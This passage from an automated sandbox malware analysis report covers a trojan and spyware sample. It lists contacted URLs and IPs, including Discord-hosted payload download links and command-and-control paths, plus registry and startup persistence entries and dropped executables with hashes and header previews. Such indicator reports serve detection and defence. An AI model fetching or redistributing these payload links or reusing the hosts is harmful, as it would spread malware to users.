                                                                                                                            https://iplogger.org/1fEwd7Islhost.exe, 0000000F.00000002.550047226.000002B9A4DB1000.00000004.00000020.sdmpfalse
                                                                                                                              high
                                                                                                                              https://bitbucket.org/X5slhost.exe, 0000000F.00000002.548114268.000002B9A4D27000.00000004.00000020.sdmpfalse
                                                                                                                                high
                                                                                                                                http://depressionk1d.ug/k8FppT/index.php?scr=1urnyuf.exe, 00000013.00000002.567901365.0000000001752000.00000004.00000020.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://tempuri.org/Entity/Id13ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://bitbucket.org/gZslhost.exe, 0000000F.00000002.548813130.000002B9A4D51000.00000004.00000020.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1We7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://cdn.discordapp.com/attachments/878034206570209333/908097655173947432/slhost.exeslhost.ernyuf.exe, 00000013.00000002.567901365.0000000001752000.00000004.00000020.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoWe7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousWe7WnoqeXe.exe, 00000001.00000002.388391103.0000000003CE1000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://schemas.xmlsoap.org/ws/2002/12/policyWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://tempuri.org/Entity/Id22ResponseWe7WnoqeXe.exe, 00000001.00000002.390321393.0000000003EFF000.00000004.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchWe7WnoqeXe.exe, 00000001.00000002.391414496.000000000409C000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://bitbucket.org/wYOslhost.exe, 0000000F.00000002.548813130.000002B9A4D51000.00000004.00000020.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://cdn.discordapp.com/attachments/878034206570209333/907992537824907284/vms.exe#1000098001httpsrnyuf.exe, 00000013.00000002.567773816.00000000016DC000.00000004.00000020.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/IssueWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://depressionk1d.ug/0E8EE1B8DFF231005E9DC5D8267227684D07A38rnyuf.exe, 00000013.00000003.453353990.000000000172B000.00000004.00000001.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/scWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://tempuri.org/Entity/Id18ResponseWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdWe7WnoqeXe.exe, 00000001.00000002.388818013.0000000003D76000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high

                                                                                                                                                                                Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                185.215.113.111
                                                                                                                                                                                unknownPortugal
                                                                                                                                                                                206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                104.192.141.1
                                                                                                                                                                                bitbucket.orgUnited States
                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                178.208.83.45
                                                                                                                                                                                depressionk1d.ugRussian Federation
                                                                                                                                                                                48282VDSINA-ASRUfalse
                                                                                                                                                                                162.159.129.233
                                                                                                                                                                                cdn.discordapp.comUnited States
                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                88.99.66.31
                                                                                                                                                                                iplogger.orgGermany
                                                                                                                                                                                24940HETZNER-ASDEfalse
                                                                                                                                                                                52.216.1.8
                                                                                                                                                                                s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                                                                                16509AMAZON-02USfalse
                                                                                                                                                                                162.159.135.233
                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                13335CLOUDFLARENETUSfalse

                                                                                                                                                                                Private

                                                                                                                                                                                IP
                                                                                                                                                                                192.168.2.1

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                Analysis ID:519882
                                                                                                                                                                                Start date:11.11.2021
                                                                                                                                                                                Start time:12:24:13
                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 15m 18s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Sample file name:We7WnoqeXe (renamed file extension from none to exe)
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                Number of analysed new started processes analysed:129
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@265/40@12/8
                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                HDC Information:
                                                                                                                                                                                • Successful, ratio: 100% (good quality ratio 50%)
                                                                                                                                                                                • Quality average: 26%
                                                                                                                                                                                • Quality standard deviation: 26%
                                                                                                                                                                                HCA Information:Failed
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Adjust boot time
                                                                                                                                                                                • Enable AMSI
                                                                                                                                                                                Warnings:
                                                                                                                                                                                Show All
                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, TrustedInstaller.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 13.89.179.12, 20.54.110.249, 52.251.79.25
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, blobcollector.events.data.trafficmanager.net, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                • VT rate limit hit for: /opt/package/joesandbox/database/analysis/519882/sample/We7WnoqeXe.exe

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                12:25:57API Interceptor117x Sleep call for process: We7WnoqeXe.exe modified
                                                                                                                                                                                12:26:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk
                                                                                                                                                                                12:26:36API Interceptor189x Sleep call for process: powershell.exe modified
                                                                                                                                                                                12:26:37API Interceptor16x Sleep call for process: slhost.exe modified
                                                                                                                                                                                12:26:45API Interceptor912x Sleep call for process: rnyuf.exe modified
                                                                                                                                                                                12:26:50Task SchedulerRun new task: rnyuf.exe path: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                12:26:58AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinNet C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                                                12:27:11AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run vms.exe C:\Users\user\AppData\Local\Temp\vms.\vms.exe
                                                                                                                                                                                12:27:17API Interceptor1x Sleep call for process: System.exe modified
                                                                                                                                                                                12:27:20AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run vms.exe C:\Users\user\AppData\Local\Temp\vms.\vms.exe
                                                                                                                                                                                12:27:33AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\20211111
                                                                                                                                                                                12:27:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run slhost.exe C:\Users\user\AppData\Local\Temp\slhost.\slhost.exe

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                No context

                                                                                                                                                                                Domains

                                                                                                                                                                                No context

                                                                                                                                                                                ASN

                                                                                                                                                                                No context

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                No context

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\ProgramData\MicrosoftNetwork\System.exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3731093
                                                                                                                                                                                Entropy (8bit):7.963381234764433
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:ow1YTv0RwUXD+CToQI4VavPdKbks6qaQ/dFNsDJf7WNcVK0k2PDNjSmjar45gOJL:0TcRwmS3dKRV/RsJWij87suW
                                                                                                                                                                                MD5:7663A0F9957107E7EF91C493A3C85261
                                                                                                                                                                                SHA1:975BFCB456E949119FD3FDD27A57247DB8F48E7B
                                                                                                                                                                                SHA-256:6C2B6603896FFE67A44133291B0DD2C8EF877444A60D6B65F8F2A8F133FFD80F
                                                                                                                                                                                SHA-512:ABA83BA941148C6EC42EF1DAC969DB55A1350F60035AAF695CF5B7CF85A3277E2668D66477ACB33E0147DBB66C1B3BC0C09F191120DA967934226A85F3A57F79
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...&.9...&...T.B.3...`.#...`.8...`.|.....#.....1...&.&...&.3...&.#...2.........0.....@.3.....3...Rich2...................PE..d.....`a.........."..........|........b........@......................................9...`..................................................@..<....P.......x`..:.................................................................................................. .........H.................. ..` ........r....N..............@..@ ./......<....>..............@... .:......s!...D..............@..@ .............f..............@..@ ..... .......h..............@..@ .....0.......j..............@..B.imports.....@.......r..............@....rsrc........P.......v..............@..@.themida..Z..`.......x..............`....boot....x5...b..v5..x..............`..`........
                                                                                                                                                                                C:\ProgramData\Systemd\CPU.zip
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):216
                                                                                                                                                                                Entropy (8bit):4.36772269682337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:vh9wmllJllElQ2ldRk1mJ/PKhqB5tTllDn6VymllJllgltPlAwdRv3llevTq4v7/:597lIl5ld+oah0Hklsl4wdJ4mLfgt+lE
                                                                                                                                                                                MD5:FD4914C5289F13C9639481A2EEBBD311
                                                                                                                                                                                SHA1:5B7103C459E71933D2B0B4CD130B8A44E2A22925
                                                                                                                                                                                SHA-256:3972C37F28CDC48836A6EE5C6248E523938054C25BE4D6A36D395FF46D536F3A
                                                                                                                                                                                SHA-512:719EA86E944E6FF1BE7C9024FF2F66E598C2DAF543A6E796FABEBE9C1AA75BBD7A4D2B9EEF26D010EF4A022C127AAA2A2187D214B31CDC642EF9C4F3AA1E6A49
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: PK......c.[.$S................3245.txt......AE.....X8.{mz..Go.<!..]H.;f...PK..............PK........c.[.$S............../....... .......3245.txt.. .........8.^r....8.^r....8.^r..........AE...PK..........e...].....
                                                                                                                                                                                C:\ProgramData\UpSys.exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):945944
                                                                                                                                                                                Entropy (8bit):6.654096172451499
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                                                                                                                                                MD5:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                                                SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
                                                                                                                                                                                SHA-256:5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
                                                                                                                                                                                SHA-512:33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\ProgramData\check.txt
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\We7WnoqeXe.exe.log
                                                                                                                                                                                Process:C:\Users\user\Desktop\We7WnoqeXe.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2291
                                                                                                                                                                                Entropy (8bit):5.3192079301865585
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:MOfHK5HKXAHKhBHKdHKB1AHKzvQTHmYHKhQnoPtHoxHImHK1HjHKoLHG1qHqHDJn:vq5qXAqLqdqUqzcGYqhQnoPtIxHbq1Dw
                                                                                                                                                                                MD5:DE699E9ED728B887F11890B4B0129926
                                                                                                                                                                                SHA1:74207E753025CE515DE95D7B7151B845BA8D6243
                                                                                                                                                                                SHA-256:D73FF535C52D521F0256E7D751A40CE0DE31C9EECAAF84D0705F17A510E61A86
                                                                                                                                                                                SHA-512:5CE2FACBEEE20554BF4664D0C0E33E1A93017A83750B67F4DD8458CD66BA6D925BA4B8FFD37473EBECF77EFD6F2B3F80A253D2B11048998FEFBBED6DDDCF759A
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\slhost[1].exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3731093
                                                                                                                                                                                Entropy (8bit):7.963381234764433
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:ow1YTv0RwUXD+CToQI4VavPdKbks6qaQ/dFNsDJf7WNcVK0k2PDNjSmjar45gOJL:0TcRwmS3dKRV/RsJWij87suW
                                                                                                                                                                                MD5:7663A0F9957107E7EF91C493A3C85261
                                                                                                                                                                                SHA1:975BFCB456E949119FD3FDD27A57247DB8F48E7B
                                                                                                                                                                                SHA-256:6C2B6603896FFE67A44133291B0DD2C8EF877444A60D6B65F8F2A8F133FFD80F
                                                                                                                                                                                SHA-512:ABA83BA941148C6EC42EF1DAC969DB55A1350F60035AAF695CF5B7CF85A3277E2668D66477ACB33E0147DBB66C1B3BC0C09F191120DA967934226A85F3A57F79
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...&.9...&...T.B.3...`.#...`.8...`.|.....#.....1...&.&...&.3...&.#...2.........0.....@.3.....3...Rich2...................PE..d.....`a.........."..........|........b........@......................................9...`..................................................@..<....P.......x`..:.................................................................................................. .........H.................. ..` ........r....N..............@..@ ./......<....>..............@... .:......s!...D..............@..@ .............f..............@..@ ..... .......h..............@..@ .....0.......j..............@..B.imports.....@.......r..............@....rsrc........P.......v..............@..@.themida..Z..`.......x..............`....boot....x5...b..v5..x..............`..`........
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\vms[1].exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):5
                                                                                                                                                                                Entropy (8bit):1.5219280948873621
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:hn:h
                                                                                                                                                                                MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                                                                                                                                                SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                                                                                                                                                SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                                                                                                                                                SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 0....
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\vms[1].exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):2588967
                                                                                                                                                                                Entropy (8bit):7.9559285316110975
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:49152:7n/kTWwbJFn/319/caDkOUjFX10G53Mq1SA6DiW+rkdciAC+6Lh82j+7AcK:7n/atdNwjFXt5dB77t6Lhz+ccK
                                                                                                                                                                                MD5:34CCA2013EB9B2941A65971919BF356D
                                                                                                                                                                                SHA1:59F15A169B6C42340849A609EDB146E2F6614076
                                                                                                                                                                                SHA-256:735D3E2EB44123FE560CE027B907B3B1494B0F926ACEB641DCDF428A21B8AAC0
                                                                                                                                                                                SHA-512:258ECE4A4530B07D4B2840D44168CFD829C0E65D562D5B2E5E94281FFCA3DCF631B22799FD0C5EEFBD40249E72709DC2ACAF1FF99B5FEE0741C3DF942ABC2535
                                                                                                                                                                                Malicious:true
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........................:........p....p....p...........:...>....>.X...>....Rich............................PE..L...F%.a.................^........... B......p....@.......................... h.....".'...@........................................................................................................................................................ V\......h".................. ..` 0....p..97...(..............@..@ tE...........`..............@... .....P.......b..............@..@ .....`..g....d..............@..B.imports.............~..............@....rsrc...............................@..@.themida..>.........................`....boot.....&.. B.'.%.................`..`................................................................................................................................
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\CPU[1].zip
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):216
                                                                                                                                                                                Entropy (8bit):4.36772269682337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:vh9wmllJllElQ2ldRk1mJ/PKhqB5tTllDn6VymllJllgltPlAwdRv3llevTq4v7/:597lIl5ld+oah0Hklsl4wdJ4mLfgt+lE
                                                                                                                                                                                MD5:FD4914C5289F13C9639481A2EEBBD311
                                                                                                                                                                                SHA1:5B7103C459E71933D2B0B4CD130B8A44E2A22925
                                                                                                                                                                                SHA-256:3972C37F28CDC48836A6EE5C6248E523938054C25BE4D6A36D395FF46D536F3A
                                                                                                                                                                                SHA-512:719EA86E944E6FF1BE7C9024FF2F66E598C2DAF543A6E796FABEBE9C1AA75BBD7A4D2B9EEF26D010EF4A022C127AAA2A2187D214B31CDC642EF9C4F3AA1E6A49
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: PK......c.[.$S................3245.txt......AE.....X8.{mz..Go.<!..]H.;f...PK..............PK........c.[.$S............../....... .......3245.txt.. .........8.^r....8.^r....8.^r..........AE...PK..........e...].....
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\UpSys[1].exe
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\slhost.exe
                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):945944
                                                                                                                                                                                Entropy (8bit):6.654096172451499
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
                                                                                                                                                                                MD5:EFE5769E37BA37CF4607CB9918639932
                                                                                                                                                                                SHA1:F24CA204AF2237A714E8B41D54043DA7BBE5393B
